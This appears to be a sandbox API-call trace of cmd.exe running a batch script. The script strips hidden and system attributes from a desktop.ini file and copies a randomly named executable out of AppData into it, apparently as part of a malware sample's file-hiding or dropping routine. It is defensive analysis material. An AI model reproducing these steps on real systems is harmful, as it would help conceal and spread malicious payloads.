_String2="del") returned 2 [0150.794] _wcsicmp (_String1="FOR/?", _String2="del") returned 2 [0150.794] _wcsicmp (_String1="IF", _String2="del") returned 5 [0150.794] _wcsicmp (_String1="IF/?", _String2="del") returned 5 [0150.794] _wcsicmp (_String1="REM", _String2="del") returned 14 [0150.794] _wcsicmp (_String1="REM/?", _String2="del") returned 14 [0150.796] _wcsicmp (_String1="type", _String2=")") returned 75 [0150.796] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0150.796] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0150.796] _wcsicmp (_String1="IF", _String2="type") returned -11 [0150.796] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0150.796] _wcsicmp (_String1="REM", _String2="type") returned -2 [0150.796] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0150.876] SetErrorMode (uMode=0x0) returned 0x0 [0150.876] SetErrorMode (uMode=0x1) returned 0x0 [0150.876] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x410460, lpFilePart=0x30f18c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x30f18c*="Desktop") returned 0x18 [0150.876] SetErrorMode (uMode=0x0) returned 0x1 [0150.876] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0150.876] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0150.882] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0150.883] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x30ef08, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30ef08) returned 0xffffffff [0150.883] GetLastError () returned 0x2 [0150.883] FindFirstFileExW (in: 
lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib", fInfoLevelId=0x1, lpFindFileData=0x30ef08, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30ef08) returned 0xffffffff [0150.883] GetLastError () returned 0x2 [0150.883] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x30ef08, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30ef08) returned 0x410638 [0150.884] FindClose (in: hFindFile=0x410638 | out: hFindFile=0x410638) returned 1 [0150.884] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x30ef08, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30ef08) returned 0xffffffff [0150.884] GetLastError () returned 0x2 [0150.884] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x30ef08, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30ef08) returned 0x410638 [0150.884] FindClose (in: hFindFile=0x410638 | out: hFindFile=0x410638) returned 1 [0150.884] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0150.884] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0150.884] GetConsoleTitleW (in: lpConsoleTitle=0x30f400, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0150.884] InitializeProcThreadAttributeList (in: lpAttributeList=0x30f288, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x30f350 | out: lpAttributeList=0x30f288, lpSize=0x30f350) returned 1 [0150.884] UpdateProcThreadAttribute (in: lpAttributeList=0x30f288, dwFlags=0x0, Attribute=0x60001, lpValue=0x30f348, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x30f288, lpPreviousValue=0x0) returned 1 [0150.884] GetStartupInfoW (in: lpStartupInfo=0x30f244 | out: lpStartupInfo=0x30f244*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", 
lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0150.885] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0150.886] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\desktop.ini\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x30f2e4*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\desktop.ini\" ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x30f330 | out: lpCommandLine="attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\desktop.ini\" ", lpProcessInformation=0x30f330*(hProcess=0x50, hThread=0x4c, dwProcessId=0xcfc, dwThreadId=0xa18)) returned 1 [0150.949] CloseHandle (hObject=0x4c) returned 1 [0150.949] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0150.949] GetEnvironmentStringsW () returned 0x410878* [0150.949] FreeEnvironmentStringsW (penv=0x410878) returned 1 [0150.949] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0151.189] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x30f224 | out: lpExitCode=0x30f224*=0x0) returned 1 [0151.189] CloseHandle (hObject=0x50) returned 1 [0151.190] _vsnwprintf (in: _Buffer=0x30f36c, _BufferCount=0x13, _Format="%08X", _ArgList=0x30f230 | out: _Buffer="00000000") returned 8 [0151.190] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") 
returned 1 [0151.190] GetEnvironmentStringsW () returned 0x412598* [0151.190] FreeEnvironmentStringsW (penv=0x412598) returned 1 [0151.190] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0151.190] GetEnvironmentStringsW () returned 0x412598* [0151.190] FreeEnvironmentStringsW (penv=0x412598) returned 1 [0151.190] DeleteProcThreadAttributeList (in: lpAttributeList=0x30f288 | out: lpAttributeList=0x30f288) [0151.190] GetConsoleTitleW (in: lpConsoleTitle=0x30f608, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0151.191] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x30e680, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x30e684, nFileSystemNameSize=0x106 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x30e680*=0xff, lpFileSystemFlags=0x0, lpFileSystemNameBuffer="NTFS") returned 1 [0151.191] _wcsicmp (_String1="NTFS", _String2="FAT") returned 8 [0151.191] _wcsicmp (_String1="desktop.ini", _String2=".") returned 54 [0151.191] _wcsicmp (_String1="desktop.ini", _String2="..") returned 54 [0151.191] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\desktop.ini" (normalized: "c:\\users\\alluse~1\\micros~1\\mf\\desktop.ini")) returned 0xffffffff [0151.191] GetLastError () returned 0x2 [0151.191] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\MF" (normalized: "c:\\users\\alluse~1\\micros~1\\mf")) returned 0x2010 [0151.192] _wcsicmp (_String1="desktop.ini", _String2=".") returned 54 [0151.192] _wcsicmp (_String1="desktop.ini", _String2="..") returned 54 [0151.192] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\desktop.ini" (normalized: "c:\\users\\alluse~1\\micros~1\\mf\\desktop.ini")) returned 0xffffffff [0151.192] GetLastError () returned 0x2 [0151.192] FindFirstFileExW (in: 
lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\desktop.ini", fInfoLevelId=0x0, lpFindFileData=0x413624, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x413624) returned 0xffffffff [0151.192] GetLastError () returned 0x2 [0151.192] _get_osfhandle (_FileHandle=2) returned 0xb [0151.192] GetFileType (hFile=0xb) returned 0x2 [0151.192] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0151.193] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x30f080 | out: lpMode=0x30f080) returned 1 [0151.193] _get_osfhandle (_FileHandle=2) returned 0xb [0151.193] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x30f0b4 | out: lpConsoleScreenBufferInfo=0x30f0b4) returned 1 [0151.193] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x40002712, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Could Not Find %1\r\n") returned 0x13 [0151.194] _get_osfhandle (_FileHandle=1) returned 0x7 [0151.194] _get_osfhandle (_FileHandle=1) returned 0x7 [0151.194] _get_osfhandle (_FileHandle=1) returned 0x7 [0151.194] GetFileType (hFile=0x7) returned 0x2 [0151.194] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0151.194] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x30f7a4 | out: lpMode=0x30f7a4) returned 1 [0151.194] _dup (_FileHandle=1) returned 3 [0151.194] _close (_FileHandle=1) returned 0 [0151.195] _wcsicmp (_String1="C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\desktop.ini", _String2="con") returned -53 [0151.195] CreateFileW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\desktop.ini" (normalized: "c:\\users\\alluse~1\\micros~1\\mf\\desktop.ini"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x30f774, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x50 [0151.270] _open_osfhandle (_OSFileHandle=0x50, _Flags=8) returned 1 [0151.270] GetConsoleTitleW (in: lpConsoleTitle=0x30f5a4, nSize=0x104 | out: 
lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0151.271] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe", fInfoLevelId=0x1, lpFindFileData=0x30f108, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30f108) returned 0x40e628 [0151.271] _wcsicmp (_String1="XEY8d7zI.exe", _String2=".") returned 74 [0151.271] _wcsicmp (_String1="XEY8d7zI.exe", _String2="..") returned 74 [0151.271] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe")) returned 0x2020 [0151.271] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x30e014, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x58 [0151.271] _open_osfhandle (_OSFileHandle=0x58, _Flags=8) returned 4 [0151.271] _get_osfhandle (_FileHandle=4) returned 0x58 [0151.271] GetFileType (hFile=0x58) returned 0x1 [0151.271] _get_osfhandle (_FileHandle=4) returned 0x58 [0151.271] GetFileSize (in: hFile=0x58, lpFileSizeHigh=0x30e06c | out: lpFileSizeHigh=0x30e06c*=0x0) returned 0x7d600 [0151.271] _get_osfhandle (_FileHandle=4) returned 0x58 [0151.271] SetFilePointer (in: hFile=0x58, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0151.272] _get_osfhandle (_FileHandle=4) returned 0x58 [0151.272] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.272] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.272] GetFileType (hFile=0x50) returned 0x1 [0151.272] _get_osfhandle (_FileHandle=1) returned 0x50 
[0151.272] GetFileType (hFile=0x50) returned 0x1 [0151.272] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.272] WriteFile (in: hFile=0x50, lpBuffer=0x30eea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.273] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.273] GetFileType (hFile=0x50) returned 0x1 [0151.273] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.273] WriteFile (in: hFile=0x50, lpBuffer=0x30eef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30eef4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.273] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.273] GetFileType (hFile=0x50) returned 0x1 [0151.273] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.273] WriteFile (in: hFile=0x50, lpBuffer=0x30ef44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30ef44*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.274] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.274] GetFileType (hFile=0x50) returned 0x1 [0151.274] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.274] WriteFile (in: hFile=0x50, lpBuffer=0x30ef94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30ef94*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.274] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.274] GetFileType (hFile=0x50) returned 0x1 [0151.274] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.274] WriteFile (in: hFile=0x50, lpBuffer=0x30efe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30efe4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.274] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.274] GetFileType (hFile=0x50) 
returned 0x1 [0151.274] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.274] WriteFile (in: hFile=0x50, lpBuffer=0x30f034*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30f034*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.274] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.274] GetFileType (hFile=0x50) returned 0x1 [0151.274] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.274] WriteFile (in: hFile=0x50, lpBuffer=0x30f084*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30f084*, lpNumberOfBytesWritten=0x30e088*=0x20, lpOverlapped=0x0) returned 1 [0151.274] _get_osfhandle (_FileHandle=4) returned 0x58 [0151.274] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e074 | out: lpNewFilePointer=0x0) returned 1 [0151.274] _get_osfhandle (_FileHandle=4) returned 0x58 [0151.274] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.275] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.275] GetFileType (hFile=0x50) returned 0x1 [0151.275] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.275] GetFileType (hFile=0x50) returned 0x1 [0151.275] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.275] WriteFile (in: hFile=0x50, lpBuffer=0x30eea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.275] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.275] GetFileType (hFile=0x50) returned 0x1 [0151.275] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.275] WriteFile (in: hFile=0x50, lpBuffer=0x30eef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30eef4*, 
lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.275] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.275] GetFileType (hFile=0x50) returned 0x1 [0151.275] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.275] WriteFile (in: hFile=0x50, lpBuffer=0x30ef44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30ef44*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.275] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.275] GetFileType (hFile=0x50) returned 0x1 [0151.275] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.275] WriteFile (in: hFile=0x50, lpBuffer=0x30ef94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30ef94*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.275] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.275] GetFileType (hFile=0x50) returned 0x1 [0151.276] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.276] WriteFile (in: hFile=0x50, lpBuffer=0x30efe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30efe4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.276] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.276] GetFileType (hFile=0x50) returned 0x1 [0151.276] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.276] WriteFile (in: hFile=0x50, lpBuffer=0x30f034*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30f034*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.276] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.276] GetFileType (hFile=0x50) returned 0x1 [0151.276] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.276] WriteFile (in: hFile=0x50, lpBuffer=0x30f084*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30f084*, lpNumberOfBytesWritten=0x30e088*=0x20, 
lpOverlapped=0x0) returned 1 [0151.276] _get_osfhandle (_FileHandle=4) returned 0x58 [0151.276] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e074 | out: lpNewFilePointer=0x0) returned 1 [0151.276] _get_osfhandle (_FileHandle=4) returned 0x58 [0151.276] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.276] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.276] GetFileType (hFile=0x50) returned 0x1 [0151.276] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.276] GetFileType (hFile=0x50) returned 0x1 [0151.276] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.276] WriteFile (in: hFile=0x50, lpBuffer=0x30eea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.276] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.276] GetFileType (hFile=0x50) returned 0x1 [0151.276] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.277] WriteFile (in: hFile=0x50, lpBuffer=0x30eef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30eef4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.277] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.277] GetFileType (hFile=0x50) returned 0x1 [0151.277] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.277] WriteFile (in: hFile=0x50, lpBuffer=0x30ef44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30ef44*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.277] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.277] GetFileType (hFile=0x50) returned 0x1 [0151.277] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.277] WriteFile (in: hFile=0x50, 
lpBuffer=0x30ef94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30ef94*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.277] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.277] GetFileType (hFile=0x50) returned 0x1 [0151.277] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.277] WriteFile (in: hFile=0x50, lpBuffer=0x30efe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30efe4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.277] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.277] GetFileType (hFile=0x50) returned 0x1 [0151.277] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.277] WriteFile (in: hFile=0x50, lpBuffer=0x30f034*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30f034*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.277] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.277] GetFileType (hFile=0x50) returned 0x1 [0151.277] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.277] WriteFile (in: hFile=0x50, lpBuffer=0x30f084*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30f084*, lpNumberOfBytesWritten=0x30e088*=0x20, lpOverlapped=0x0) returned 1 [0151.277] _get_osfhandle (_FileHandle=4) returned 0x58 [0151.278] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e074 | out: lpNewFilePointer=0x0) returned 1 [0151.278] _get_osfhandle (_FileHandle=4) returned 0x58 [0151.278] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.278] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.278] GetFileType (hFile=0x50) returned 0x1 [0151.278] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0151.278] GetFileType (hFile=0x50) returned 0x1 [0151.278] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.278] WriteFile (in: hFile=0x50, lpBuffer=0x30eea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.278] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.278] GetFileType (hFile=0x50) returned 0x1 [0151.278] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.278] WriteFile (in: hFile=0x50, lpBuffer=0x30eef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30eef4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.278] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.278] GetFileType (hFile=0x50) returned 0x1 [0151.278] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.278] WriteFile (in: hFile=0x50, lpBuffer=0x30ef44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30ef44*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.278] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.278] GetFileType (hFile=0x50) returned 0x1 [0151.278] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.278] WriteFile (in: hFile=0x50, lpBuffer=0x30ef94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30ef94*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.278] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.278] GetFileType (hFile=0x50) returned 0x1 [0151.278] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.279] WriteFile (in: hFile=0x50, lpBuffer=0x30efe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30efe4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.279] _get_osfhandle (_FileHandle=1) returned 0x50 
[0151.279] GetFileType (hFile=0x50) returned 0x1 [0151.279] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.279] WriteFile (in: hFile=0x50, lpBuffer=0x30f034*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30f034*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.279] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.279] GetFileType (hFile=0x50) returned 0x1 [0151.279] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.279] WriteFile (in: hFile=0x50, lpBuffer=0x30f084*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30f084*, lpNumberOfBytesWritten=0x30e088*=0x20, lpOverlapped=0x0) returned 1 [0151.279] _get_osfhandle (_FileHandle=4) returned 0x58 [0151.279] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e074 | out: lpNewFilePointer=0x0) returned 1 [0151.279] _get_osfhandle (_FileHandle=4) returned 0x58 [0151.279] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.279] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.279] GetFileType (hFile=0x50) returned 0x1 [0151.279] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.279] GetFileType (hFile=0x50) returned 0x1 [0151.279] 